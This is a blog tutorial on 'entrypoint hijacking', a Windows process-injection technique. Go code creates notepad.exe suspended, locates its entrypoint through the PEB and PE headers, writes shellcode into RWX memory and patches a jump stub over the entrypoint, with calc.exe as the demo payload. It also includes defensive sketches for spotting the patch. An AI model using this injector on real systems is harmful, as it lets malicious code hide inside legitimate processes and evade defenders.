Malware Development: Entrypoint hijacking
This blog post is for educational purposes only. The techniques described here are commonly used by malware but are also essential for security researchers and defenders to understand. All testing should be conducted in controlled lab environments only. Never attempt these techniques against systems you don't own or have explicit permission to test.
Comments
I wanted to use Go for this project as it's a language I am working on polishing my skills with at the moment. With that said, after diving into this, I think Nim is probably a better fit for this kind of work (Winim, its Windows API binding, is much more mature than what Go offers).
The full code can be accessed here.
This post documents my journey down the process injection TTP rabbit hole. On a scale of evasiveness, I'd rate this technique above average, with CreateRemoteThread at the bottom of the barrel and APC queuing somewhere around average.
I don't know enough about EDR/AV to say this confidently, so take it with a grain of salt.
The technique is still detectable (inspecting process memory will reveal the tampering), but it gains some evasiveness by executing within a legitimate process.
Understanding Process Injection
Process injection remains one of the most effective techniques in malware development and offensive security. While full process hollowing involves replacing the entire image of a process, this post examines a more targeted approach: entrypoint hijacking. This technique redirects execution at the entrypoint of a legitimate process to malicious code without replacing the process image, so arbitrary code runs while the process keeps its original outward appearance. In my experience it is also more reliable than full hollowing, because process startup on modern Windows has many moving parts that a wholesale image replacement has to get right.
When injecting code into a process, several key steps are involved:
- Create/attach to a target process
- Allocate memory in the target process
- Write shellcode to the allocated memory
- Redirect execution to the injected code
This process relies on understanding memory structures and the Windows PE file format.
Windows Process Structure
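Three pieces of information matter for process injection, drawn from the process's runtime state and from the PE (Portable Executable) format:
- PEB (Process Environment Block) - A per-process runtime structure (not part of the PE file itself) that holds process information, including the image base address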
- Image Base Address - Where the executable is loaded in memory
- Entrypoint - Where execution begins
By navigating these structures, we can locate precisely where to inject our code. My favourite resource for a high-level summary of Windows PE files is this blog post.
Creating a Suspended Process
```go
targetPath := windows.StringToUTF16Ptr("C:\\Windows\\System32\\notepad.exe")
var pi windows.ProcessInformation
var si windows.StartupInfo
si.Cb = uint32(unsafe.Sizeof(si))

// Create the process in a suspended state
err := windows.CreateProcess(
	nil,                      // lpApplicationName
	targetPath,               // lpCommandLine
	nil,                      // lpProcessAttributes
	nil,                      // lpThreadAttributes
	false,                    // bInheritHandles
	windows.CREATE_SUSPENDED, // dwCreationFlags
	nil,                      // lpEnvironment
	nil,                      // lpCurrentDirectory
	&si,                      // lpStartupInfo
	&pi)                      // lpProcessInformation
```
The 'CREATE_SUSPENDED' flag is critical here: it ensures the process doesn't begin execution until we're ready. I've left the CreateProcess parameter names in as comments; they are taken straight from the docs.
Finding the Entrypoint
The most interesting part (in my opinion) involves navigating the PE file structure to find the entrypoint.
```go
// Get basic process information
var pbi windows.PROCESS_BASIC_INFORMATION
var returnLen uint32
res := windows.NtQueryInformationProcess(
	pi.Process,
	windows.ProcessBasicInformation,
	unsafe.Pointer(&pbi),
	uint32(unsafe.Sizeof(pbi)),
	&returnLen)

// Read the ImageBaseAddress from the PEB
pebAddr := uintptr(unsafe.Pointer(pbi.PebBaseAddress))
imageBaseAddrPtr := pebAddr + 0x10
var imageBaseAddr uintptr
var bytesRead uintptr

err = windows.ReadProcessMemory(
	pi.Process,
	imageBaseAddrPtr,
	(*byte)(unsafe.Pointer(&imageBaseAddr)),
	unsafe.Sizeof(imageBaseAddr),
	&bytesRead)
```
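The 0x10 offset is worth a second look, since it only holds for 64-bit processes. The sketch below mirrors just the first few fields of the 64-bit PEB as they appear in publicly documented layouts and asks Go for the offset of ImageBaseAddress. The struct name pebPrefix64 and the helper imageBaseOffset are hypothetical names for illustration, and only the prefix needed to reach the field is modelled.

```go
package main

import (
	"fmt"
	"unsafe"
)

// pebPrefix64 is a hypothetical mirror of the first fields of the 64-bit PEB.
// It is an illustration of the layout, not a complete or official definition.
type pebPrefix64 struct {
	InheritedAddressSpace    byte
	ReadImageFileExecOptions byte
	BeingDebugged            byte
	BitField                 byte
	_                        [4]byte // alignment padding before the first pointer
	Mutant                   uint64  // pointer-sized on x64
	ImageBaseAddress         uint64  // pointer-sized on x64
}

// imageBaseOffset returns the byte offset of ImageBaseAddress in the sketch.
func imageBaseOffset() uintptr {
	var p pebPrefix64
	return unsafe.Offsetof(p.ImageBaseAddress)
}

func main() {
	fmt.Printf("ImageBaseAddress offset: 0x%X\n", imageBaseOffset())
}
```

In a 32-bit process the pointers shrink to four bytes and the field moves, so a hard-coded 0x10 should be treated as an x64-only assumption.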
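Next, we navigate the PE header to find the entrypoint offset. The DOS header stores the offset of the PE header in its e_lfanew field at 0x3C. From the PE header, AddressOfEntryPoint sits at 0x28: 4 bytes of signature, 20 bytes of file header, then 16 bytes into the optional header.
A good resource, with a helpful graphic, is this post on GitHub. It explains the offsets within the PE structures, which is what lets us work out where specific addresses (such as the entrypoint) live in memory.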
```go
// Find the entrypoint
var e_lfanew uint32
err = windows.ReadProcessMemory(
	pi.Process,
	imageBaseAddr+0x3C,
	(*byte)(unsafe.Pointer(&e_lfanew)),
	unsafe.Sizeof(e_lfanew),
	&bytesRead)

peHeaderAddr := imageBaseAddr + uintptr(e_lfanew)
addressOfEntryPointOffset := peHeaderAddr + 0x28
var addressOfEntryPoint uint32

err = windows.ReadProcessMemory(
	pi.Process,
	addressOfEntryPointOffset,
	(*byte)(unsafe.Pointer(&addressOfEntryPoint)),
	unsafe.Sizeof(addressOfEntryPoint),
	&bytesRead)

entryPointAddr := imageBaseAddr + uintptr(addressOfEntryPoint)
```
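The same offset arithmetic can be checked offline, without touching another process. The following is a minimal sketch that walks a PE image held in a byte slice; entryPointRVA and fakeImage are hypothetical helpers written for this illustration, and the image base and RVA in main are made-up demo values. It reads only the fields discussed above and is not a full PE parser (the standard library's debug/pe package is the better choice for that).

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

const (
	offsetELfanew       = 0x3C // e_lfanew in the DOS header
	offsetEntryPointRVA = 0x28 // 4 (signature) + 20 (file header) + 16 (optional header)
)

// entryPointRVA reads AddressOfEntryPoint from a PE image held in memory.
func entryPointRVA(image []byte) (uint32, error) {
	if len(image) < offsetELfanew+4 {
		return 0, errors.New("buffer too small for a DOS header")
	}
	if image[0] != 'M' || image[1] != 'Z' {
		return 0, errors.New("missing MZ signature")
	}
	peOff := uint64(binary.LittleEndian.Uint32(image[offsetELfanew:]))
	if peOff+offsetEntryPointRVA+4 > uint64(len(image)) {
		return 0, errors.New("e_lfanew points outside the buffer")
	}
	if string(image[peOff:peOff+4]) != "PE\x00\x00" {
		return 0, errors.New("missing PE signature")
	}
	return binary.LittleEndian.Uint32(image[peOff+offsetEntryPointRVA:]), nil
}

// fakeImage builds a buffer containing only the fields this sketch reads.
func fakeImage(peOff, rva uint32) []byte {
	img := make([]byte, int(peOff)+offsetEntryPointRVA+4)
	copy(img, "MZ")
	binary.LittleEndian.PutUint32(img[offsetELfanew:], peOff)
	copy(img[peOff:], "PE\x00\x00")
	binary.LittleEndian.PutUint32(img[peOff+offsetEntryPointRVA:], rva)
	return img
}

func main() {
	const imageBase = 0x140000000 // made-up base address for the demo
	rva, err := entryPointRVA(fakeImage(0x80, 0x1A2B0))
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	// The virtual address of the entrypoint is the image base plus the RVA.
	fmt.Printf("entrypoint VA: 0x%X\n", uint64(imageBase)+uint64(rva))
}
```

Running the same function over the bytes of a file on disk is also a handy way to compare what the entrypoint should be against what a live process reports.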
Creating the JMP Instruction
A critical element is the assembly jump instruction that redirects execution:
```go
// Create a JMP instruction to the given address (for x64)
func createJmpToInstruction(targetAddr uintptr) []byte {
	jmpCode := make([]byte, 12)
	jmpCode[0] = 0x48
	jmpCode[1] = 0xB8

	// Copy target address to the instruction
	targetAddrBytes := (*[8]byte)(unsafe.Pointer(&targetAddr))
	copy(jmpCode[2:10], targetAddrBytes[:])

	jmpCode[10] = 0xFF
	jmpCode[11] = 0xE0

	return jmpCode
}
```
This function creates the machine code that will redirect execution to our shellcode. It generates a 12-byte x64 sequence: 48 B8 followed by the 8-byte address is mov rax, imm64, which loads our address into the RAX register, and FF E0 is jmp rax, which jumps to it. This is a generic stub, so don't worry if it isn't obvious at first. Almost everyone uses something along these lines to jump to an arbitrary address, and I'd expect you to find something very similar in real malware samples.
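To make the byte layout concrete, and to show what this tampering looks like from the defender's side, here is a small sketch that builds the same 12 bytes without unsafe and then recognises them again. encodeJmpRax and decodeJmpRax are hypothetical helper names, and the address in main is a placeholder rather than anything meaningful.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// encodeJmpRax builds: mov rax, imm64 (48 B8 + 8 bytes) ; jmp rax (FF E0).
func encodeJmpRax(target uint64) []byte {
	stub := make([]byte, 12)
	stub[0], stub[1] = 0x48, 0xB8
	// x64 immediates are stored little-endian.
	binary.LittleEndian.PutUint64(stub[2:10], target)
	stub[10], stub[11] = 0xFF, 0xE0
	return stub
}

// decodeJmpRax reports whether b starts with that stub and, if so, its target.
func decodeJmpRax(b []byte) (uint64, bool) {
	if len(b) < 12 || b[0] != 0x48 || b[1] != 0xB8 || b[10] != 0xFF || b[11] != 0xE0 {
		return 0, false
	}
	return binary.LittleEndian.Uint64(b[2:10]), true
}

func main() {
	stub := encodeJmpRax(0x1122334455667788) // placeholder address
	fmt.Printf("% X\n", stub)

	target, ok := decodeJmpRax(stub)
	fmt.Printf("target=0x%X matched=%v\n", target, ok)
}
```

A check like decodeJmpRax run over the first bytes at a process's entrypoint is one simple way this patch shows up in memory, which is why I wouldn't call the technique stealthy on its own.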
Allocating Memory for Shellcode
We allocate memory within the target process for our shellcode:
```go
// Allocate memory for our shellcode
shellcodeAddr, err := VirtualAllocEx(
	pi.Process,
	0, // Let Windows choose the address
	uintptr(len(shellcode)),
	MEM_COMMIT|MEM_RESERVE,
	PAGE_EXECUTE_READWRITE)
```
It's important to note that VirtualAllocEx allocates memory directly within the target process's address space, not in our own process. Classic CreateRemoteThread injection allocates memory in the target in the same way; the difference between the two techniques lies in how execution is redirected to that memory.
Writing Shellcode and Modifying the Entrypoint
After writing the shellcode to the allocated memory, we modify memory protection to allow writing to the entrypoint:
```go
// Change memory protection at entrypoint to allow writing
var oldProtect uint32
err = VirtualProtectEx(
	pi.Process,
	entryPointAddr,
	uintptr(len(jmpInstruction)),
	PAGE_EXECUTE_READWRITE,
	&oldProtect)

// Write JMP instruction at the entrypoint
err = windows.WriteProcessMemory(
	pi.Process,
	entryPointAddr,
	&jmpInstruction[0],
	uintptr(len(jmpInstruction)),
	&bytesWritten)

// Restore original memory protection
err = VirtualProtectEx(
	pi.Process,
	entryPointAddr,
	uintptr(len(jmpInstruction)),
	oldProtect,
	&oldProtect)
```
Handling Instruction Cache
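CPUs cache instructions, so after rewriting code in the target we flush the instruction cache to make sure stale bytes from the entrypoint are not executed. As far as I know this is largely a formality on x86/x64, but it is the documented practice after modifying code in memory: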
```go
// Flush instruction cache to ensure the processor sees our changes
err = FlushInstructionCache(
	pi.Process,
	entryPointAddr,
	uintptr(len(jmpInstruction)))
```
Resuming Execution
Finally, we resume the process:
```go
// Resume the suspended thread
_, err = windows.ResumeThread(pi.Thread)
```
Observing the Technique in Action
To demonstrate this technique, the code includes pause points where you can attach a debugger such as x64dbg and examine the process before and after modification.
The following excerpt shows the 'notepad.exe' process in its suspended state. Note the RCX register value: it points to the entrypoint of the process, which is where we want to patch in our jump instruction.
The following two images are before and after our patching occurs. The first is the initial program before we write our jump instruction to the entrypoint:
And this is after:
Finally, this GIF documents the full execution. It shows the entrypoint before and after patching, follows the jump through process memory to where the actual shellcode has been written, and ends with calc.exe popping to confirm the PoC.
References
- https://malapi.io
- https://github.com/golang/sys
- https://github.com/xdavidel/NimHollow/tree/main
- https://attack.mitre.org/techniques/T1055/012/